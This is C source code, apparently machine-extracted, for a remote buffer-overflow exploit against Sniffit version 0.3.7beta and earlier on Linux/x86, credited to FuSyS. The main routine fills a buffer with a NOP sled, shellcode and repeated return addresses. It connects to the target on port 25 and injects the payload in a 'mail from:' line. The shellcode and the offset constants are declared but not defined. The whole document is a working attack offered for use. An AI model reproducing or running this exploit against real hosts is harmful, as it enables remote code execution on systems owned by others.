
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int sin ;


 int AF_INET ;
 int ALIGNOP ;
 int LENGTH ;
 int OFFSET ;
 scalar_t__ RET ;
 int SOCK_STREAM ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int exit (int ) ;
 int fprintf (int ,char*,char*) ;
 int htons (int) ;
 int memset (struct sockaddr_in*,int ,int) ;
 int nameResolve (char*) ;
 int printf (char*,...) ;
 char* shellcode ;
 int socket (int ,int ,int ) ;
 int stderr ;
 int strlen (char*) ;
 int strncat (char*,char*,int) ;
 int write (int,char*,int) ;

int main(int argc,char **argv)
{
        char buff[LENGTH+ALIGNOP+1];
 char cmd[610];
        long addr;
        unsigned long sp;
        int offset=OFFSET;
        int i, x;
        int sock;
        struct sockaddr_in sin;

 if(argc<2) {
  fprintf(stderr, "Usage: %s <sniffit host>\n", argv[0]);
  exit(0);
 }

        sp=(unsigned long) RET;
        addr=sp-offset;

 for(i=0;i<120-ALIGNOP;i++)
  buff[i]=0x90;
 for(x=0; x<strlen(shellcode); i++, x++)
  buff[i]=shellcode[x];
 for(i-=1 ; i<LENGTH; i+=4) {
  buff[i ] = addr & 0x000000ff;
    buff[i+1] = (addr & 0x0000ff00) >> 8;
    buff[i+2] = (addr & 0x00ff0000) >> 16;
    buff[i+3] = (addr & 0xff000000) >> 24;
  }

 printf("\nSniffit <=0.3.7beta Linux/x86 Remote Exploit\n");
 printf("by FuSyS [S0ftpj|BFi] - http://www.s0ftpj.org\n\n");

        memset(&sin,0,sizeof(sin));
        sin.sin_family=AF_INET;
        sin.sin_port=htons(25);
        sin.sin_addr.s_addr=nameResolve(argv[1]);

 printf("Connecting to %s ...\n", argv[1]);

        if((sock=socket(AF_INET,SOCK_STREAM,0))<0)
        {
                printf("Can't create socket\n");
                exit(0);
        }
        if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0)
        {
                printf("Can't connect to Sniffit Server\n");
                exit(0);
        }

 printf("Injecting ShellCode ...\n");

 strncat(cmd, "mail from:", 10);
 strncat(cmd, buff, strlen(buff));
 write(sock, cmd, strlen(cmd));

 printf("Done!\n\n");

        return(0);
}
